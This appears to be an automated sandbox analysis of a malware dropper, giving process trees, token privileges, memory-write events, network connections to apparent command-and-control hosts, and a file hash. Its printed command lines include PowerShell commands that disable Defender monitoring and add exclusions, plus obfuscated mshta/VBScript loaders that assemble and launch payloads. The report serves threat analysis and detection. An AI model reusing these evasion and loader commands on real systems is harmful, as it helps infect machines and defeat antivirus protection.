Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19411ac950924ec3f.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c78ded4d176ac.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2668 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe
PID 2668 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe
PID 2668 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe
PID 2668 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe
PID 2668 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe
PID 2668 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe
PID 2668 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe
PID 1864 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1688 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1688 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1688 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1688 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1688 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1688 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1688 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 1928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 1928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 1928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 1928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 1928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 1928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 1928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1864 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1864 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19879c4c0e.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19325eb008c0b950.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue195c40958f528163.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19f51bcd77a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c06f159e0ec.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1993b3f72c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue193858933525b62.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19150ee2be694c8a4.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue192762f1cd058ddf8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19411ac950924ec3f.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c78ded4d176ac.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c1338f41ab.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19325eb008c0b950.exe

Tue19325eb008c0b950.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19761b3b8d9d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19b4ef3b53293fe.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1993b3f72c.exe

Tue1993b3f72c.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19411ac950924ec3f.exe

Tue19411ac950924ec3f.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe

Tue19f51bcd77a.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19150ee2be694c8a4.exe

Tue19150ee2be694c8a4.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1969586bcbf58493.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c1338f41ab.exe

Tue19c1338f41ab.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe

Tue19761b3b8d9d.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe

Tue19879c4c0e.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1969586bcbf58493.exe

Tue1969586bcbf58493.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe

Tue193858933525b62.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c06f159e0ec.exe

Tue19c06f159e0ec.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe

Tue195c40958f528163.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c78ded4d176ac.exe

Tue19c78ded4d176ac.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe

Tue19b4ef3b53293fe.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue192762f1cd058ddf8.exe

Tue192762f1cd058ddf8.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue192762f1cd058ddf8.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue192762f1cd058ddf8.exe"

C:\Users\Admin\AppData\Local\Temp\is-67S6C.tmp\Tue19879c4c0e.tmp

"C:\Users\Admin\AppData\Local\Temp\is-67S6C.tmp\Tue19879c4c0e.tmp" /SL5="$C0156,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-5JAEG.tmp\Tue19879c4c0e.tmp

"C:\Users\Admin\AppData\Local\Temp\is-5JAEG.tmp\Tue19879c4c0e.tmp" /SL5="$40206,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe") do taskkill -iM "%~nXx" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1864 -s 488

C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe

~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ

C:\Windows\SysWOW64\taskkill.exe

taskkill -iM "Tue193858933525b62.exe" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE ( cREatEObjEcT ( "wscript.sHeLl" ). Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 , TruE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ECHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"

C:\Windows\SysWOW64\msiexec.exe

msiexec -Y .\bENCc.E

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

Network

Country Destination Domain Proto
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 sayanu.xyz udp
US 8.8.8.8:53 t.gogamec.com udp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 gcl-gb.biz udp
US 8.8.8.8:53 propanla.com udp
US 8.8.8.8:53 telegatt.top udp
US 52.203.72.196:443 www.listincode.com tcp
FR 91.121.67.60:2151 tcp
NL 194.104.136.5:46013 tcp
US 54.205.158.59:443 www.listincode.com tcp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 172.67.74.161:443 iplogger.org tcp
NL 194.104.136.5:46013 tcp
US 172.67.74.161:443 iplogger.org tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 telegka.top udp
US 107.178.223.183:80 telegka.top tcp
FI 135.181.129.119:4805 tcp
NL 45.9.20.13:80 tcp
N/A 127.0.0.1:49318 tcp
N/A 127.0.0.1:49320 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.22:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 23.192.22.93:80 www.microsoft.com tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 104.155.138.21:80 telegka.top tcp
NL 194.104.136.5:46013 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
US 72.84.118.132:8080 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 107.178.223.183:80 telegka.top tcp
US 72.84.118.132:8080 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
US 107.178.223.183:80 telegka.top tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.23.210.82:80 r11.o.lencr.org tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.qxsgxd.com udp
FI 135.181.129.119:4805 tcp
NL 45.9.20.13:80 tcp
US 104.155.138.21:80 telegka.top tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 107.178.223.183:80 telegka.top tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 104.155.138.21:80 telegka.top tcp

Files

\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe

MD5 ba794724c566766d57e2aee175cde54a
SHA1 401fb41eaf42791c66738f460009ba00f7cdd913
